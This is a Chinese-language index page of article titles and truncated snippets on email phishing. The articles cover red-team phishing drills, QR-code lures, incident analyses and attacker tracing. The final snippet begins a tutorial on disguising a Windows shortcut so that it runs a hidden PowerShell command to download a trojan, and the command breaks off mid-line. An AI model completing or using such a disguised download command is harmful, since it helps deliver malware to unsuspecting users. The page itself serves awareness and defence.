安全攻防之邮件钓鱼1、准备工作域名:需要申请一个域名(尽量和目标域名相仿)来搭建邮箱服务器。服务器:本次服务器选择 racknerd(以Ubuntu22为例)。SMTP 服务器:使用iRedMail搭...
二维码-邮件钓鱼历险记
临近年末,公司又要举办“钓鱼演练”,之前钓鱼是以<a>标签链接的方式取诱导点击,想着员工对于“链接”多少有防备心了,故这次想换个花样。恰好朋友Y君不久前用了二维码钓鱼效果不错,索性就换成二...
一次冒充安全部门的模拟邮件钓鱼攻击分析
事件概述本次山石网科情报中心捕获到一起国内关联的安全事件,攻击者以信息泄露为话题通过邮件的方式与目标用户进行接触,借由白+黑的方式执行Cobalt Strike生成的beacon。其中邮...
第72篇:近年HVV、红队攻防比赛中常见外围打点漏洞的分析与总结
前言 大家好,我是ABC_123。前一段时间我花时间花精力总结了最近两三年中,在攻防比赛中比较常见的Web打点漏洞类型,捎带着把钓鱼邮件的主题类型也总结了一下。今天分享出来,相信...
近年HVV、红队攻防比赛中常见外围打点漏洞的分析与总结
前言 大家好,我是ABC_123。前一段时间我花时间花精力总结了最近两三年中,在攻防比赛中比较常见的Web打点漏洞类型,捎带着把钓鱼邮件的主题类型也总结了一下。今天分享出来,相信...
记录一次邮件钓鱼
事件背景 上个月针对公司全员进行了一次信息安全意识培训,于是为了验证一下培训效果,趁五一假期刚结束大家还没正式进入工作状态,开展了本次邮件钓鱼攻击。模拟域名准备 &...
【系列连载】蓝初百题斩(5)
❝作者:夏小芸, “蓝初百题斩”连载,今天带来第5期内容:服务器资源异常检查服务器负载情况:使用系统监视工具(如top、htop或glances等)来检查服务器的负载状况。如果负载过高,请考虑升级服务...
安全攻击溯源思路及案例
在攻防的视角里,进攻方会占据比较多的主动性,而防守方则略显被动,因为作为防守方,你永远也不知道攻击会在什么时候发生。你所能做的是,做好自己该做的一切,准备好自己该准备的一切,耐心等待对手犯错的机会。 ...
钓鱼邮件(上)
钓鱼邮件(上)0x00前言随着近几年攻防演练不断地推进,防守目标单位的安全设备随之层层堆叠堆叠,网络边界的防御能力也大大加强,导致攻击方常规的漏洞打点的难度大大增加。钓鱼攻击应运而生,经过近两年演练活...
一次持续的邮件钓鱼攻击的简单溯源分析
一、基本情况 昨天连续收到两封欺骗邮件,分别是凌晨和下午,邮件的主题、内容都是一样的,主要 是发送人的信息不同,两份邮件截图如下所示:第一封:第二封:邮件内容中,欺...
邮件钓鱼演练指南
前言企业安全建设逐渐完善,但仍存在薄弱点,人为因素便是其中之一,无论是在攻防对抗中,还是面对APT威胁中,企业员⼯安全意识成为影响企业安全隐患的重灾区。钓⻥邮件就是针对企业员工进行的攻击⼿段之一,通过...
【创宇小课堂】常用的邮件钓鱼伪装方法
快捷方式修改快捷方式中的目标栏内容执行powershell命令下载木马将以下内容写入目标栏中C:WindowsSystem32cmd.exe /c powershell.exe -nop -w hid...